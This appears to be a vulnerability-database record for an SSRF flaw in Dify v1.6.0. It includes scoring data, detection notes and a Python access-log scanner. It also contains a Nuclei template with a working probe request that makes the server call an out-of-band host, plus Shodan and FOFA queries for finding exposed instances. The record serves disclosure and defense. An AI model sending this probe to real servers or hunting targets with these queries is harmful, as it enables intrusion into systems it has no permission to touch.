cbcvebase.
CVE-2025-56520
published 2025-09-30


Priority: P278
Severity: medium, 5.3 (CVSS 3.1)
CVSS vector: AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Exploitation: ITW / exploit available, VulnCheck KEV (exploited in the wild)
EPSS: 0.65% (46.5th percentile)
Dify v1.6.0 was discovered to contain a Server-Side Request Forgery (SSRF) via the component controllers.console.remote_files.RemoteFileUploadApi. A different vulnerability than CVE-2025-29720.

Affected (1 range)

Vendor  Product  Version range  Fixed in
dify    dify     -              -

Detection & IOCs (extracted from sources)

url: GET /console/api/remote-files/http%3A%2F%2F{{interactsh-url}}%2Ftest HTTP/1.1
path: /console/api/remote-files/
nuclei template:
id: CVE-2025-56520
info:
  name: Dify v1.6.0 - Server-Side Request Forgery
  author: 0x_Akoko
  severity: high
  description: |
    Dify v1.6.0 contains a server side request forgery caused by improper validation in controllers.console.remote_files.RemoteFileUploadApi, letting attackers make arbitrary requests from the server; exploitation requires network access.
http:
  - raw:
      - |
        GET /console/api/remote-files/http%3A%2F%2F{{interactsh-url}}%2Ftest HTTP/1.1
        Host: {{Hostname}}
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "file_type"
          - "file_length"
        condition: and
      - type: word
        part: content_type
        words:
          - "application/json"
      - type: word
        part: interactsh_protocol
        words:
          - "http"
          - "dns"
        condition: or
      - type: status
        status:
          - 200
  • SSRF is triggered via the RemoteFileUploadApi endpoint by passing a URL-encoded external URL as a path parameter to /console/api/remote-files/. Monitor for outbound HTTP/DNS requests originating from the Dify server process following requests to this path.
  • A successful SSRF probe returns HTTP 200 with a JSON body containing both 'file_type' and 'file_length' fields and Content-Type: application/json. Use these response characteristics to confirm exploitation.
  • Out-of-band detection: monitor for unexpected HTTP or DNS callbacks from the Dify server host to external/internal infrastructure after requests to /console/api/remote-files/ with a URL-encoded value in the path.
  • Use Shodan query 'http.title:"Dify"' or FOFA query 'title="Dify"' to identify internet-exposed Dify instances that may be targeted.
  • The NVD entry scores this CVE as MEDIUM (5.3), while the Nuclei template author rates it HIGH (9.3, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N). Defenders should note the discrepancy and assess based on their network exposure.
  • This is explicitly noted as a different vulnerability from CVE-2025-29720, which also affects Dify's remote file upload functionality. Ensure both CVEs are patched independently.
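The detection notes above (a URL-encoded absolute URL in the /console/api/remote-files/ path parameter, then HTTP 200 with an application/json body) can be applied to web-server access logs. The following is an added example, not part of this record or of Dify; it assumes a constructed log format whose last field is the response Content-Type (as nginx can log with $sent_http_content_type), and the sample lines and hostnames are constructed.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed sample log lines (not from the record): a probe that got a JSON 200,
# the same probe answered with 403, and a benign request under the same API prefix.
SAMPLE_LOG = """\
10.0.0.5 - - [30/Sep/2025:10:01:02 +0000] "GET /console/api/remote-files/http%3A%2F%2Fcallback.example%2Ftest HTTP/1.1" 200 87 "application/json"
10.0.0.5 - - [30/Sep/2025:10:01:03 +0000] "GET /console/api/remote-files/http%3A%2F%2Fcallback.example%2Ftest HTTP/1.1" 403 23 "application/json"
10.0.0.9 - - [30/Sep/2025:10:02:10 +0000] "GET /console/api/remote-files/upload HTTP/1.1" 404 12 "text/html"
"""

# Assumed log layout: client, ident, user, [time], "request line", status, bytes, "content type".
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<ctype>[^"]*)"'
)
PREFIX = "/console/api/remote-files/"


def classify(line):
    """Return None for lines that do not match the probe pattern, else a finding dict."""
    m = LOG_RE.match(line)
    if not m or not m.group("path").startswith(PREFIX):
        return None
    # Everything after the prefix is the path parameter; decode it and check whether
    # it is a full URL (scheme://host/...), which is what the SSRF probe passes.
    raw_param = m.group("path")[len(PREFIX):].split("?", 1)[0]
    decoded = unquote(raw_param)
    parts = urlsplit(decoded)
    if parts.scheme not in ("http", "https") or not parts.netloc:
        return None
    status = int(m.group("status"))
    # The Nuclei matchers treat 200 + application/json as a successful probe.
    success = status == 200 and m.group("ctype").startswith("application/json")
    return {
        "client": m.group("client"),
        "target": decoded,
        "target_host": parts.hostname,
        "status": status,
        "verdict": "probable successful SSRF" if success else "SSRF attempt",
    }


def scan(log_text):
    """Run classify() over every line and keep only the findings."""
    return [hit for hit in (classify(line) for line in log_text.splitlines()) if hit]
```

Findings with a "probable successful SSRF" verdict are the ones to correlate with outbound HTTP or DNS traffic from the Dify host in the same time window.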

CVSS provenance

nvd: CVSS v3.1, 5.3 MEDIUM (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)
vulncheck: 4.8 MEDIUM